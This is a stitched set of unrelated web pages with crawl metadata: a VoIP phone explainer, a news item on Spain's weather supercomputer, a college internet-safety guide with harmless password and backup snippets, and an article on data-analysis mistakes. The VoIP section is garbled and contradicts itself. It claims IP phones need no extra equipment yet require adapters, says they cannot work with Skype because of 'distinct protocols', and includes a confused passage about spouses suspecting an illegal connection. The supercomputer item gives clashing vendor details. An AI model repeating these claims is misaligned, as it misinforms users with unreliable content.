IP landline phones not only help you save money on your phone bills, but they also improve the quality of your calls. Unlike conventional landline phone conversations, the quality of calls made with these sets will be entirely dependent on the speed and reliability of your internet connection.
These phones are becoming more popular among businesses because they operate efficiently and include cutting-edge capabilities. Additionally, the low cost of installation and maintenance for this landline set contributes to overall savings on utility costs.
What is the difference between a traditional phone and an IP phone?
All call-related functions of an IP phone are made accessible via internet services since IP phones are based on the Internet Protocol (IP). The VoIP handset (Voice over Internet Protocol) enables the transmission of voice messages from the caller to the receiver via the internet using a computer.
All internet services are delivered via Ethernet cables linked to a router, which can also create a wireless network connection. Because IP phones operate via the internet protocol, they do not need the additional wiring required by an analog phone system. Furthermore, since they can be wireless, IP phones give users the additional benefit of mobility.
Why would someone use a VoIP phone?
Many reasons exist for why you might want to switch from your current phone system to a VoIP phone system. The primary motivation for this is cost savings. If you opt to utilize a VoIP phone, you will save money by removing the need for telephone lines and call costs.
However, saving money isn’t the only advantage of using a VoIP phone system. Switching to VoIP phones is less expensive than continuing to use conventional analog phone services.
If you compare VoIP phone pricing to the cost of installing copper or fiber-optic lines for conventional phone service, adding extra ethernet connections or letting VoIP use a Wi-Fi connection will save you a considerable amount of money on your initial deployment.
In addition to saving money by using VoIP, you can make lower-cost long-distance calls. VoIP network services from high-quality provider firms are now available all across the world, even in developing countries. When you have access to the internet, you can use a VoIP phone to communicate without incurring international long-distance fees.
Furthermore, you will discover that it is feasible to use your email account to log in to VoIP services while on the road. To communicate with team members and consumers, all you need is a headset or an IP phone. There is no need to search for a local phone number or SIM card while traveling abroad.
Can VoIP call normal phones?
To make a VoIP call, you need a suitable IP phone or VoIP calling app, which has been given an IP address (or, in some cases, a conventional number) that allows calls to be made from your network to a regular telephone or mobile phone. In comparison to landline phones, these provide high-definition (HD) phone calls.
Calling a regular landline over the internet from a VoIP service is straightforward, and you can also use VoIP from a landline handset. You just need an adapter that connects to either your wall phone socket or your router, and you can then make calls, including international calls, from the landline phone using VoIP.
To make use of your landline phone, you would normally expect to have a physical connection to a phone line. However, with VoIP, you can continue to use your landline phone while avoiding the limitations, inconvenience, and expenses associated with traditional phone service.
VoIP does not need to operate from a specific telephone or device to be effective and to reap the most advantages of the technology’s features and functions.
All of the important characteristics, such as adaptability, flexibility, and cost-effectiveness, are right at your disposal. If you decide to upgrade to a more advanced handset or even a headset, you will get access to extra user-friendly features such as programmable buttons and call storage, as well as the ability to employ cordless technology.
Call quality is the most frequent concern with VoIP calls. This factor is heavily influenced by the type of your internet connection. More and more service providers are moving to a broadband-by-default service choice that you can use with VoIP. These services are delivered via platforms that offer helpful, extra VoIP capabilities.
Caller identification, voicemail, call diversion, and anonymous call blocking are some of the capabilities available. The flexibility of the system, as well as the selection of devices that can be used with it, is critical for corporate VoIP users, especially for large organizations.
What are the advantages and disadvantages of an IP phone?
One of the advantages of this technology is that no additional equipment or special connection is needed to make or receive phone calls via the internet.
An IP phone system can be used for both private and commercial communication, making it a versatile tool. An IP phone system gives the user the ability to connect to the global network from any point along the network’s path. This ability is not possible with traditional phone system configurations.
IP networks are dependable and safe. All communications over them are reliable and secure as long as they are handled with caution. Since most IP phones start up automatically when connected to the Internet, they don’t need the purchase of any additional gear to operate properly.
One major disadvantage is that the finest IP phone brands available are only for business or personal conversations, which is not ideal. If you use an unprotected or prepaid cellular phone, the IP service will not offer you any security or privacy protection.
If your spouse or children discover that you are communicating with them via this “hidden” or unprotected means, they may conclude that you are engaged in an illegal connection. As you might imagine, this would be unfortunate news for the person, as well as for his or her spouse and children.
To safeguard your sensitive and confidential conversations, you might want to purchase both a landline telephone and a mobile phone to use in combination with your IP phone system, if you want to be as secure as possible.
The fact that IP phones are not compatible with VoIP services such as Skype or Google Talk is another significant drawback of utilizing an IP phone. These IP-based services operate on protocols that are distinct from normal internet protocols, and as a result, they cannot be used successfully with an IP phone system.
VoIP services are getting more popular as more people switch from landlines and instead rely on their mobile devices for communication purposes. As a result, to get access to these services, company owners will need to purchase a second line that will link to an IP-enabled server.
Can IP phones be used at home?
It is not necessary to have a permanent location to use a VoIP phone system. With VoIP, you may make and receive calls via your internet connection rather than through conventional phone systems that need local infrastructure.
This implies that you can physically transport a VoIP phone to any place where you can connect it to the internet and make and receive calls just as you would if you were in the office.
Your clients will not be aware of the change, since your phone number is virtual in the cloud. Your Caller ID appears the same on any display, allowing you to do business as usual even if you’re sitting at home in your shorts.
A proper setup is all that is required in addition to a reliable internet connection. Simply connect your VoIP Internet Phone Adapter to any accessible broadband connection and you will be able to use your VoIP phone from any location on the planet.
Further reading: How to Connect Phone to the Ethernet
Using a hosted voice service instead of IP phones is one option to consider. Currently, a plethora of IP webphone providers exist. Most provide a hosted VoIP system that allows users to connect without having to buy IP phones themselves.
Hosted voice service is simply another telephone system that is hosted on a web server and can be accessed via your IP-based mobile device, as opposed to a traditional telephone system.
Consider the following examples: you can use your mobile phone to make a call to any IP-enabled phone system in the globe, and you can also log into the server and make a call from your laptop computer.
An IP phone system provides your business with the economic and long-term advantages it needs to continue to expand. The benefits of using an IP phone are many, including its simplicity of use, reduced maintenance requirements, and ever-improving capabilities.
Using an IP phone system eliminates a large portion of the on-site work needed to maintain a landed telephone system.
There is no need for you to wait for a professional to arrive to program a new extension, install updates, or conduct a maintenance check on your gear, since all of these tasks are performed remotely.
Whether you’re involved in high performance computing or not, almost every one of your days is likely planned around the findings of HPC-enabled advanced modeling and simulations for weather forecasting that tell us whether to carry an umbrella, wear extra sunscreen, or if the roads will be safe to drive on.
But as more severe weather events occur and the threat of climate change grows more serious, weather forecasting is taking on even more prominence. And the trend of blaming the weatherman for botched predictions is only set to go down as more sophisticated systems and models enter into the climate equation.
Most recently, Spain made steps toward this end by commissioning a new bullx supercomputer through the Spanish Meteorological Agency (AEMET) with the hopes of bolstering the country’s weather forecasting and climate research.
The addition of the Bull supercomputer is expected to help bridge the decades-wide gap between short-term weather forecasting and extended climate predictions. The result should be a more accurate understanding of climate change that is specific to each of the country’s regions, in each season of the year.
The bullx system is on track to provide performance in the range of 168 teraflops, which represents 75 times the capability of the Cray supercomputer it will replace. Expected to weigh in as Spain’s third-fastest supercomputer, the system will feature Bull’s direct liquid cooling system, which uses water at room temperature to generate energy consumption savings of 20-40 percent compared with traditional air-cooling or cold water-based cooling systems.
To complement the hardware upgrade, AEMET also plans to implement new forecasting models that are capable of making predictions down to the 1-2 mile scale, to better cope with severe local weather such as thunderstorms.
The modeling system, called HARMONIE/Arome, has already made its mark on European meteorology, offering an initial range of 36 hours and spatial resolution of 1.5 miles. The models will focus on the Iberian Peninsula and Balearic Islands, as well as the Canary Islands.
A large-scale atmospheric chemistry model already in place at AEMET, called MOCAGE, is expected to see improved resolution, more extensive coverage and more accurate air quality predictions. MOCAGE will also have an emergency mode for real-time predictions in case of a hazardous materials leak or other industrial accident.
This news follows a recent trend across the US and Europe of bolstering its climate infrastructure. Most recently, the US National Weather Service announced that it has signed a $44.5 million contract with IBM to deliver a ten-fold increase in computing power. Since Big Blue spun off its x86 biz to Chinese-owned Lenovo, Cray has been tapped to supply the new systems. When the work is completed later this year, NWS will have a combined 5-petaflops of supercomputing capability, enabling it to run the kind of sophisticated weather predictions that are the lifeblood of its mission.
Similarly, the Met Office in the United Kingdom has signed a $128 million deal with Cray for multiple Cray XC supercomputers and Cray Sonexion storage systems. The three-phase, multi-year project represents the largest supercomputer contract ever for Cray outside of the United States, and is expected to complement other Cray systems seeking to answer weather and climate problems posed at the European Center for Medium Range Weather Forecasting (ECMWF) and several other weather prediction and climate forecasting centers worldwide.
The Met Office, like representatives from the US and Spain, is emphasizing the necessity of the upgrades in order to ensure forecast accuracy, which ultimately means greater planning and safety during severe weather events.
This need was recently illustrated when ECMWF accurately predicted the touchdown of Hurricane Sandy on the United States East Coast with the help of two 2.5 petaflops systems, while domestic (US) models running on twin 213-teraflops systems showed the hurricane heading away from land.
Back in Spain, AEMET is planning to further leverage its upgrades by using the bullx system off of land as well. The agency is expanding its focus to encompass maritime forecasting services, wave prediction and hydrological monitoring, where it will predict and study the effects that rain and snow may have on watercourses. | <urn:uuid:a95889fb-6515-4a67-9f0d-e0650e461b65> | CC-MAIN-2022-40 | https://www.hpcwire.com/2015/01/15/spain-grabs-bull-horns/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00488.warc.gz | en | 0.950101 | 897 | 3.234375 | 3 |
Let’s face it…
Cyber safety isn’t the number one concern for college students. That said, recent studies show that hackers are targeting universities and students more frequently. Did you know that private educational institutions receive more malicious emails than any other sector?
Cybercriminals won’t hesitate to steal your sensitive information and hack into your accounts if given a chance. They don’t care if you’re a struggling student without a job. That’s what they look for; they rely on naivety and lack of life experience to fool their victims.
This guide will teach you everything you need to know about staying safe from online criminals. We’ll go into detail about data theft protection, online dating risks, how to protect your bank accounts, social media profiles, and more.
Let’s get started.
College students are exposed to various online threats, whether working on assignments, chatting with friends and family, or just relaxing and watching videos. Dangers include viruses, phishing scams, identity theft, cyberbullying, etc.
While it can be tempting to ignore these dangers and hope they’ll simply disappear, the uncomfortable truth is they are very real and can have serious consequences.
Say a college student’s personal information fell into the wrong hands; hackers could use this data to steal the student’s identity or commit fraud. This is why it’s so important that college students understand how to protect themselves, their peers, and their university from cyber threats.
Hackers could use a student’s data to steal their identity or commit fraud.
It comes as no surprise that most teens and college students spend a lot of time online. According to a survey by Common Sense Media:
84% of teens own a smartphone.
On average, they use their smartphones for seven hours daily.
They watch three hours of online video content per day.
70% of teenage girls use social media every day.
60% of teenagers use computers to complete their homework daily.
Furthermore, a recent study published in Frontiers in Psychiatry, which polled 1,043 college students at King's College London, found that nearly 40% are addicted to their smartphones.
Over seven million US college students enrolled in at least one distance education course, and roughly 3.4 million attended classes exclusively online.
Since the outbreak of Covid-19, students have been spending more time online than ever before. For many, this means more screen time and less physical interaction with others. While some take advantage of the extra time to connect with friends and family online, others find it difficult to stay connected and motivated.
The increase in online time has also led to more opportunities for cyberbullying and other negative behaviors. As we continue to adapt to life with Covid-19, we must learn how to keep college students safe and engaged in their learning.
Several factors make undergraduates more vulnerable to online threats, including:
Sharing too much personal information. Students often have lots of personal information online, including names, addresses, phone numbers, and email addresses. This makes it easy for scammers to target college students with phishing emails and other scams.
They’re unaware of the dangers. Many undergraduates may not be aware of the risks. This lack of understanding makes them vulnerable to personal information requests, such as credit card promotions.
They take more risks. College students may be more likely to take risks online, such as clicking on links from unknown sources or meeting strangers in person.
They don’t often monitor their accounts. Students begin maintaining their finances and using credit cards in college. Many miss fraudulent transactions and fail to check their credit reports regularly.
A student’s lack of awareness makes them vulnerable to the dangers associated with personal information requests on campus.
There are several safety risks college students face online. Some of the most common dangers include:
Cyberbullying — This is a serious problem that can lead to depression, anxiety, and even suicidal thoughts. Cyberbullying among college students is often a continuation of earlier forms of bullying that occurred in middle school or high school.
Phishing scams — Phishing scams are emails or text messages that look like they're from a legitimate source but are actually from a scammer. It’s not uncommon for students to receive emails from scammers impersonating school officials and fall into the trap of paying large sums of money.
Job scams — Job scammers convince students to provide their social security numbers and other sensitive information. Many scam artists even send unsolicited job offers and interview requests.
Identity theft — Identity theft can ruin a student’s credit score, leaving them thousands of dollars in debt.
Fraudulent online shopping sites — Students are always looking for great deals online. Thus, they may wind up clicking on links to fraudulent online shopping websites. These sites appear legitimate (as professional photos are used to mimic real e-commerce sites), but they’re often phishing scams.
Online dating fraud — Many college students use dating apps such as Tinder to look for love online. Unfortunately, many dating profiles are catfishers — scammers using fake accounts to dupe individuals looking for love to obtain money from them.
Campus theft — Theft involving laptops, phones, wallets, etc., is a serious problem on many campuses.
Data breaches — Colleges and universities attract hackers as they store massive quantities of data and personal information. Data includes student grades and the Personal Identifiable Information (PII) of teachers and students. Perpetrators may use techniques like DDoS attacks and Man-in-the-Middle attacks.
Malware — Malware (aka malicious software) infects your computer causing severe problems. Undergrad devices are commonly infected with malware as students often download pirated movies, games, programs, and other files.
Cyberbullying has become an increasingly prevalent problem on college campuses. Thanks to the widespread use of social media, students find it easier to bully their peers anonymously.
In many cases, cyberbullying can be just as damaging as traditional bullying, leading to feelings of isolation, depression, and anxiety. Moreover, because cyberbullying can occur anytime, anywhere, it can be difficult for victims to escape their tormentors.
College administrators and counselors are still trying to figure out the best way to address this problem. In the meantime, victims of cyberbullying need to know that they’re not alone and that plenty of resources are available to help them cope with this difficult situation.
Reach out to a trusted friend or family member for support.
Block the person bullying you and report their behavior to the platform administrator.
Save any evidence of the bullying (e.g., screenshots of abusive messages). This can be used as proof if further action is required.
Talk to a counselor or other mental health professional if you struggle to cope with the situation.
Do not hesitate to reach out for help if you experience cyberbullying. There are people who care and will support you through this difficult time.
A new research study reveals that nearly 90% of institutions are putting students, alumni, and faculty in danger by failing to put protections against email phishing, spoofing, and counterfeiting in place.
As a result, colleges and universities are a large target for cyber attackers armed with fraudulent emails.
It’s not uncommon for a student to receive an email from someone posing as a school official stating that the student has missed their tuition payment.
Scammers threaten victims with severe penalties, such as being dismissed from classes if they don’t pay immediately.
Never click on links in emails or messages unless you're sure they're legitimate. Contact the “source” of the email, such as a university, to verify the message if you're unsure.
Keep an eye out for signs that indicate phishing. These include misspellings, grammatical errors, and spoofed email addresses.
Take caution when giving out private information online. Only give your personal information to websites you trust.
College students are among the most frequent victims of identity theft. In fact, identity theft is five times more likely to affect students than the average person. This is because undergrads live in close quarters with one another and don’t take enough safety measures.
For example, college students are susceptible to identity theft because personal information is often left unattended in unlocked dorm rooms. Furthermore, some students don’t bother to adequately protect their smartphones with passwords or biometric identification. In addition, undergraduates often use free Wi-Fi networks that are not always secure.
If someone steals your identity, follow these steps to minimize the damage.
1. Contact the three major credit bureaus (Experian, Equifax, and TransUnion) and place a fraud alert on your credit report. This will prevent criminals from opening new accounts in your name.
2. Contact your bank and other financial institutions with whom you have accounts. Tell them your identity has been stolen and ask them to freeze your accounts.
3. File a police report and identity theft complaint with the Federal Trade Commission to protect you from future fraud and identity theft.
Identity theft is five times more likely to affect students than the average person.
The following are some best practices for using smartphones safely in college:
Keep your personal devices with you at all times. Smartphones are valuable. It's important to keep them with you whenever possible. Consider carrying them in your front pocket or purse instead of a backpack.
Make sure your phone is locked when you're not using it. Set a screen lock password or use biometrics like face recognition or fingerprint security.
Be aware of your surroundings. When you're using your smartphone in public, be mindful of your surroundings, including anyone who can see your screen. Avoid using your phone in deserted areas.
Enable your phone's security settings. These include automatic updates, data backup, Wi-Fi protection features, remote locking, and phone tracking.
Download apps from trusted sources. This includes the App Store for Apple devices and Google Play for Android devices. Fake apps that look legitimate exist; they often contain malware that collects personal information, like social security numbers.
Most college students are very active on social media. But many don't realize the risks associated with sharing too much information.
For example, if you share your location on social media, criminals can easily find you and familiarize themselves with your schedule. This makes it easy for them to commit crimes like burglary or assault.
You should also be careful about sharing personal information, such as your birth date, address, and phone number. Once this information is out there, it's not easy to take it back.
To protect yourself on social media:
Never share your location on social media. If you want to check in somewhere, do it after you've left.
Don't share personal information, such as your address or phone number.
Be careful about who you're friending or following on social media. Only add people with whom you’re familiar.
Regularly review your privacy settings to ensure that only people you want to see your information can see it.
Be careful about sharing personal information, such as your date of birth, address, or phone number on social media.
With the rise of online learning, more and more students are opting to take classes remotely. While this has many advantages, it's essential to be aware of the Internet safety risks involved. Here are a few safety tips for college students enrolled in online classes:
Only use trusted websites and platforms to participate in online courses.
Create strong passwords for all online accounts. Don't use the same password across accounts.
Log out of your online accounts when you finish using them.
Use a VPN and robust antivirus software like Bitdefender or McAfee.
Unfortunately, college students easily fall victim to online shopping scams, and online shopping has only grown more popular among students since the pandemic. Take the following precautions to make sure your data remains secure:
Only shop on websites you trust. Be wary of sites with pop-ups and ads that seem suspicious.
When entering your credit card number or other sensitive information, look for "https://" in the URL, indicating the site uses encryption. Keep an eye out for a padlock icon in the address bar.
If using a public Wi-Fi connection, be aware that your information could be compromised. Wait until you're on a secure connection before sharing any sensitive data.
Ensure your computer has up-to-date security software to protect against malware and online threats.
College students buy more products online than ever before.
College students need to be especially careful when it comes to online dating. As many students seek love online, there is no shortage of scammers seeking to capitalize on their feelings.
On dating apps, cybercriminals often rely on catfishing: they create false online identities to trick students into financial scams and other fraudulent scenarios.
Safety tips for college students who are looking for love online:
Only use reputable dating websites and apps.
Do your research before meeting anyone in person.
Always meet in a public place and let a friend know where you're going.
Don't give out too much personal information.
Trust your gut. If something feels strange, it probably is.
Armed with these safety tips, you can remain safe from online predators and enjoy a successful online dating experience.
Be extra careful when using a computer that isn’t yours — for example, in libraries, Internet cafes, and school. Follow these digital safety tips:
Beware of unsecured Wi-Fi networks. Public Wi-Fi is often insecure. Try to use it for non-sensitive tasks only. Connect to your Wi-Fi network or use your data plan when possible. Alternatively, use a VPN to encrypt your data while using public Wi-Fi.
Don’t store payment info on websites or browsers. When you make online purchases using a public computer or public Wi-Fi network, don’t store your payment information on the website or browser. Doing so only makes it easy for thieves to access your data.
Secure laptops and other devices. When you’re not using your computer, lock it. Use a strong password, and don’t leave it in plain sight.
Beware of infected devices left on campus. If you find a USB drive or other device on campus (including in your dorm room), don’t plug it into your computer. It could be infected with malware.
Avoid using ATMs in public places. Thieves can install skimming devices on ATMs that capture your card information. When possible, use ATMs located inside banks.
Connect to your Wi-Fi network or use your data plan whenever possible.
You likely don't have a highly secure campus network that restricts and regulates traffic and new devices, so you're on your own regarding online security. Here are tips regarding how college students can remain safe and privacy-savvy on campus.
The best tips for protecting your online accounts include:
Use caution when posting online. Before putting anything on the internet, think carefully. Once it's in cyberspace, you can’t remove it. Don’t put anything online that you don't want your family, other students, instructors, or future and present employers to see!
Use strong passwords. A strong password should have at least 12 characters and contain a mix of uppercase and lowercase letters, numbers, and symbols.
Don't use the same password across accounts. Use a password manager to store and generate strong passwords for you safely. We recommend password managers such as Bitdefender Password Manager and Norton Password Manager.
Always change your password after a data breach. Change your passwords immediately if you think a data breach has exposed your accounts. It’s good practice to change them regularly, as well.
Set up two-factor authentication when available. Two-factor authentication is an extra layer of security that requires you to confirm your identity with a code before logging in.
Be cautious of email phishing signs: poor grammar, bad design, etc. Avoid clicking on links or downloading attachments from unknown sources.
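To make the strong-password tip concrete, here is a small sketch using Python's built-in secrets module. The function name and symbol set are arbitrary choices for illustration, not part of any particular guideline:

```python
import secrets
import string

SYMBOLS = "!@#$%^&*()-_=+"  # the symbol set here is an arbitrary choice

def generate_password(length: int = 16) -> str:
    """Generate a random password mixing upper/lowercase letters, digits, and symbols."""
    alphabet = string.ascii_letters + string.digits + SYMBOLS
    while True:
        pwd = "".join(secrets.choice(alphabet) for _ in range(length))
        # Retry until the candidate contains all four character classes.
        if (any(c.islower() for c in pwd) and any(c.isupper() for c in pwd)
                and any(c.isdigit() for c in pwd) and any(c in SYMBOLS for c in pwd)):
            return pwd

print(generate_password())  # e.g. 'mK4+qTz!9wR-bX2e' (different every run)
```

A password manager will do this for you automatically, but the sketch shows why randomly generated passwords are hard to guess: each character is drawn independently from a large alphabet.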
If a device becomes lost or stolen, you'll want to have a backup of all your data. This includes documents, photos, and other important files. If someone hacks you, you can quickly restore your data to its previous state.
How to back up your data:
use an external hard drive or cloud storage service
use iCloud for Apple devices and Google Drive for Android devices
use an antivirus software solution with automatic backup features
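As a rough illustration of the external-drive option, a few lines of Python can copy a folder into a timestamped backup folder. The function and the example paths are hypothetical, not taken from any particular backup product:

```python
import shutil
import time
from pathlib import Path

def backup_folder(source: str, dest_root: str) -> Path:
    """Copy `source` into a new timestamped folder under `dest_root`."""
    stamp = time.strftime("%Y%m%d-%H%M%S")
    target = Path(dest_root) / f"backup-{stamp}"
    shutil.copytree(source, target)  # fails loudly if `target` already exists
    return target

# Hypothetical usage -- point dest_root at an external drive or synced cloud folder:
# backup_folder("C:/Users/me/Documents/school", "E:/backups")
```

In practice, cloud services and antivirus suites automate this, but the idea is the same: keep a dated copy of your files somewhere other than the original device.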
You can help protect yourself from fraud and identity theft by monitoring your financial accounts. As a college student, staying on top of your spending habits is always a good idea to avoid debt.
Take a break from studying and follow these tips when reviewing your bank and credit card statements:
Schedule some time each month to review your statements. Add it to your calendar or set a reminder on your phone so you don't forget.
When reviewing statements, compare the transactions to your records. Contact your bank or credit card company immediately if there are any discrepancies.
Take note of any unusual or large transactions. This could be a sign of fraud or identity theft.
You can help protect yourself from fraud and identity theft by monitoring your financial accounts.
Pop-up blockers are essential tools that keep your computer safe and secure while browsing the internet, especially if you’re using free Wi-Fi provided on campus. They help protect your computer from malicious pop-ups that sometimes contain viruses or spyware. Eliminating unwanted pop-ups will also speed up your browsing experience.
How to block pop-ups in Google Chrome:
1. Open Google Chrome and click on the three dots in the top right corner.
2. Select "Settings" from the menu.
3. Click the "Privacy and Security" option in the left-hand menu.
4. Select "Site Settings" and scroll down until you see the "Pop-ups and Redirects" option.
5. Click on "Don't allow sites to send pop-ups or use redirects."
Universities are already accessible enough targets for hackers; don’t make it easier for threat actors to steal your data. Encryption consists of scrambling your data so only authorized users can access it. When you encrypt your data, it's much more difficult for hackers to steal it.
College students can use encryption tools to protect their data. Here are some of the most common ones available:
Encryption software — These encryption tools are installed on your computer and encrypt all stored data. Examples include BitLocker (Windows) and FileVault (Mac).
Encrypted hard drive — This type of external hard drive is encrypted to protect the data stored inside.
Virtual private network (VPN) — These encryption tools create a secure, private connection between your computer and the Internet. Examples include CyberGhost, Private Internet Access, and ExpressVPN.
You probably use your laptop and smartphone for learning purposes. The more you use a device, the more reason to keep it secure. One of the best ways to keep a device safe is to ensure its software is up-to-date. Hackers can exploit these security vulnerabilities to gain access to your data or take control of your computer.
Enable automatic updates to ensure that your software is always up-to-date. Software updates usually correct all security vulnerabilities. This way, you'll never have to worry about manually installing updates.
In addition to updating your software, it's also important to update your operating system. Operating system updates usually include security patches and new features that can help improve your computer's security.
Always keep your software and operating system up-to-date.
When you get a new computer or mobile device, it's essential to dispose of your old one properly as it may include your personally identifiable information (PII) or that of other students. This includes wiping clean any stored personal data.
To wipe clean your computer or mobile device, use built-in factory reset features:
System > Recovery > Reset this PC (Windows)
Erase All Contents and Settings (Mac, iPhone, or iPad)
System & Updates > Reset (Android)
Alternatively, you can use third-party tools to securely delete all the data on your hard drives, such as CCleaner and those included with antivirus software. Once you've wiped clean your old device, you can recycle, sell, or donate it to another student without worry.
Most college students don’t consider using antivirus solutions until their computer gets a virus. However, it's important to use an antivirus to protect yourself from malware, such as spyware, trojan viruses, adware, ransomware, and other online safety threats. An antivirus will also protect your personal information.
There are many antivirus solutions available, both free and paid. Consider ease of use, price, features, and reviews when choosing an antivirus solution. Bitdefender, Norton, and McAfee are some of the leading names in antivirus software.
There's been a lot of news surrounding data breaches and privacy concerns lately. It's no wonder that so many people these days are using VPNs to protect their online activity. College students are especially vulnerable to these threats as they often use public Wi-Fi networks.
College students can encrypt their traffic and make it much harder for hackers to snoop on their activities by using a VPN. In addition, VPNs can also help bypass campus and geo-restrictions that may be in place.
There are many VPNs to choose from, both free and paid. Be sure to choose one that meets your needs. Some things you may want to consider when choosing a VPN provider are speed, security, price, and reviews. You can use a free VPN, like TunnelBear, or a paid VPN like ExpressVPN or CyberGhost.
College students can encrypt their traffic and protect their online activities by using a VPN.
To summarize, here are the most crucial Internet safety tips for college students:
Report incidents of cyberbullying and block the attacker.
Only use trusted websites when shopping online.
Secure your accounts with strong passwords and two-factor authentication.
Enable smartphone security features, such as biometrics and automatic updates.
Back up your data regularly using a cloud service or external drive.
Review your bank and credit card statements monthly to track your spending.
Secure your laptop and other devices, and don't leave them unattended.
Beware of unsecured Wi-Fi networks; use a VPN if you have to use public Wi-Fi.
Enable pop-up blockers to prevent malicious pop-ups from infecting your browser.
Use encryption tools such as disk-encryption software for stored data and VPNs for data you send over the Internet.
Update your software regularly to minimize the number of vulnerabilities.
Watch out for phishing scams like job scams. Don't click on suspicious links and double-check a company before responding.
Learn how to combat the dangers of social media. Never give out your location, address, or other sensitive information.
Get antivirus software to protect your devices from malware, spyware, trojan viruses, adware, ransomware, and other online security threats.
Use a VPN to protect your privacy when using public Wi-Fi or campus networks.
Octav Fedor (Cybersecurity Editor)
Octav is a cybersecurity researcher and writer at AntivirusGuide. When he’s not publishing his honest opinions about security software online, he likes to learn about programming, watch astronomy documentaries, and participate in general knowledge competitions. | <urn:uuid:e59e7407-ee7c-4299-a4a7-ad27274c3519> | CC-MAIN-2022-40 | https://www.antivirusguide.com/cybersecurity/internet-safety-college-students/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00488.warc.gz | en | 0.929764 | 4,886 | 3.0625 | 3 |
When performing data analysis, it can be easy to slide into a few traps and end up making mistakes. Diligence is essential, and it’s wise to keep an eye out for the following 7 potential mistakes you can make. These include:
- Sampling bias
- Cherry-picking
- Disclosing metrics
- Overfitting
- Focusing only on the numbers
- Solution bias
- Communicating poorly
Let’s take a look at why each one can be problematic and how you might be able to avoid these issues.
Sampling bias occurs when a non-representative sample is used. For example, a political campaign might sample 1,300 voters only to find out that one political party’s members are dramatically overrepresented in the pool. Sampling bias should be avoided because it can weigh the analysis too far in one particular direction.
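To see how much a skewed sampling frame can distort a result, here is a small hypothetical simulation in Python; the population, weights, and sample size are invented for illustration:

```python
import random
import statistics

random.seed(42)  # fixed seed so the illustration is reproducible

# Hypothetical population of 10,000 voters: exactly half support a policy.
population = [1] * 5000 + [0] * 5000  # 1 = supports, 0 = does not

# Fair sample: every voter is equally likely to be polled.
fair_sample = random.sample(population, 1300)

# Biased frame: supporters are three times as likely to enter the pool,
# e.g. because the poll was run somewhere supporters congregate.
weights = [3 if v == 1 else 1 for v in population]
biased_sample = random.choices(population, weights=weights, k=1300)

print(round(statistics.mean(fair_sample), 2))    # close to the true 0.50
print(round(statistics.mean(biased_sample), 2))  # inflated toward 3/(3+1) = 0.75
```

The biased poll overstates support by roughly 25 percentage points even though each individual response is honest; the error comes entirely from who got sampled.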
Cherry-picking happens when data is stacked to support a particular hypothesis. It’s one of the more intentional problems that appear on this list because there’s always a temptation to give the analysis a nudge in the “right” direction. Not only is cherry-picking unethical, but it may have more serious consequences in fields like public policy, engineering, and health.
Disclosing metrics is a problem because a metric becomes useless once subjects know its value. This ends up creating problems like the habit in the education field of teaching to what’s on standardized tests. A similar problem occurred in the early days of internet search when websites started flooding their content with keywords to game the way pages were ranked.
Overfitting tends to happen during the analysis process. Someone might have a model, for example, whose curve seems impressively predictive. Unfortunately, the curve only looks predictive because the model has been tuned to fit the quirks of the sample data. The failure of the model may only become apparent when it is compared to future observations that aren’t so well-fitted.
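A deliberately extreme sketch of the same idea: a "model" that simply memorizes its training data scores perfectly on data it has seen and fails badly on new observations (all numbers here are invented):

```python
import random
from statistics import mean

random.seed(0)  # reproducible illustration

def true_f(x):
    return 2 * x + 1  # the (unknown) real relationship; noise is added below

train = [(x, true_f(x) + random.gauss(0, 1)) for x in range(20)]
future = [(x + 0.5, true_f(x + 0.5) + random.gauss(0, 1)) for x in range(20)]

# Overfit "model": memorizes every training point and guesses 0 anywhere else.
lookup = dict(train)
def overfit_model(x):
    return lookup.get(x, 0.0)

# Simple model: an ordinary least-squares line fitted to the training data.
xs = [x for x, _ in train]
mx, my = mean(xs), mean(y for _, y in train)
slope = sum((x - mx) * (y - my) for x, y in train) / sum((x - mx) ** 2 for x in xs)
intercept = my - slope * mx
def line_model(x):
    return slope * x + intercept

def mse(model, data):
    return mean((model(x) - y) ** 2 for x, y in data)

print(mse(overfit_model, train))   # 0.0: looks perfect on data it has seen
print(mse(line_model, train))      # small but nonzero
print(mse(overfit_model, future))  # enormous: memorization fails on new points
print(mse(line_model, future))     # still small
```

The memorizing model has zero training error, which is exactly the seductive signal overfitting produces; only the held-out "future" data reveals that the simple line is the better model.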
Focusing only on the numbers is worrisome because it can have adverse real-world consequences. For example, existing social biases can be fed into models. A company handling lending might produce a model that induces geographic bias by using data derived from biased sources. The numbers may look clean and neat, but the underlying biases can be socially and economically turbulent.
Solution bias can be thought of as the gentler cousin of cherry-picking. With solution bias, a solution might be so cool, interesting or elegant that it’s hard not to fall in love with. Unfortunately, the solution might be wrong, and appropriate levels of scientific and mathematical rigor might not be applied because refuting the solution would just seem disheartening.
Communicating poorly is more problematic than you might expect. Producing analysis is one thing, but conveying findings in an accessible manner to people who didn’t participate in the project is critical. Data scientists need to be comfortable with producing elegant and engaging dashboards, charts and other work products to ensure their findings are well-communicated.
How to Avoid These Problems
Process and diligence are your primary weapons in combating mistakes in data analysis. First, you must have a process in place that emphasizes the importance of getting things right. When you’re creating a data science experiment, there need to be checks in place that will force you to stop and consider things like:
- Where is the data coming from?
- Are there known biases in the data?
- Can you screen the data for problems?
- Who is checking everybody’s work?
- When will results be re-analyzed to verify integrity?
- Are there ethical, social, economic or moral implications that need to be examined more closely before starting?
Diligence is also essential. You should be looking at concerns about whether:
- You have a large and representative enough sample to work with
- There are more rigorous ways to conduct the analysis
- Analysts are following properly outlined procedures
Tackling a data science project requires sufficient and ample planning. You also have to consider ways to refine your work and to keep improving your processes over time. It takes commitment, but a group with the right culture can do a better job of steering clear of avoidable mistakes. | <urn:uuid:13a397ad-7da1-416f-ab29-a438b35500c9> | CC-MAIN-2022-40 | https://www.inzata.com/the-7-most-common-data-analysis-mistakes-to-avoid/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00488.warc.gz | en | 0.937981 | 885 | 2.734375 | 3 |
